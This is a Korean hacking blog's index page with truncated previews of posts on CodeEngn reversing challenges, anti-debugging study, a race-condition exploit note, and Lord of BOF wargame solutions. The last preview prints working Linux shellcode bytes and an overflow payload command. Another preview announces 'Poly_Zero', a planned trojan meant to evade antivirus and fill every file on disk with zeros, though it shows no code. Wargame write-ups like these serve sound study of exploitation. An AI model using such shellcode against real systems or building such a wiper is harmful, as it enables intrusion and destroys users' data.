본문 바로가기

CodeEngn Basic RCE, Crypto, Malware 올 클리어 + 사진 Basic RCE 하고 Crypto 는 똑같은 사진이네요 ㅠㅠ (사진 같기도 하고 Basic 은 오래전에 클리어 해서 사진이 없다는 ㅋ) Malware 이야 다른 사진이다 ㅋㅋ 빨리 Advanced 깨고 사진을 확인해 봐야 겠어요 ㅋㅋㅋ 더보기
[Poly_Zero] 0. Project Start! ( 2014/5/28 ) 주요 기능은, 자체 프로그램 암호화, 안티 디버깅, 백신에 탐지 안됨(지금 만든거 Virus Total 에 테스트 해 보니 카스트키퍼 딱 하나 걸렸음), 등등... 에서 이펙트를 줄 예정입니다. 아! 프로젝트명이 Zero 인 이유는, 결론적으로 디스크에 있는 모든 파일을 Zero 로 채워 버리는 기능을 넣을거기 때문에 이렇게 지었어요 ㅋㅋㅋ Project : Poly_Zero(trojan + worm?) Language : C++ , asm, C, (API) Compiler : vc110 Platform : Windows Architecture : x86 Classfication : Virus -> Trojan Function : [+] When Detected, Self Destructing with .. 더보기
[Docs] Race Condition Exploit with Unix Signal Race Condition Exploit with Unix SignalThis is the first time, i learn about race condition exploit with Unix Signalwhat a fresh idea!! Example Code 1234567891011121314#include int main(int argc, char *argv[]) { char buf[4096]; if (argc 더보기
아까비..ㅋㅋ 요즘 안티 디버깅 분야를 파고 있는데.. 공부하는데 어떤 레지스터를 보게 됨! . 그리고 그 값이 디버깅 시나 일반 실행 시 값이 달라지는걸 봄 오! 새로운 안티 디버깅 기법 발견인가? 하고 혹시 있나 찾아봤는데 는 있었음 ㅋㅋㅋㅋ 는 3주일 전 이야기..ㅋㅋ 더보기
[Lord Of Bof] Lord Of BOF Solutions ( Redhat ) Solutions Level 1 - Simple Buffer Overflow ; buffer[256] | ebp[4] | ret[4] ; ; need to run with bash2 because of \x00 and \xff ; shellcode : \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 bytes ; buffer addr : \x18\xf9\xff\xbf ; payload : ./gremlin $(python -c 'print "A"*20.. 더보기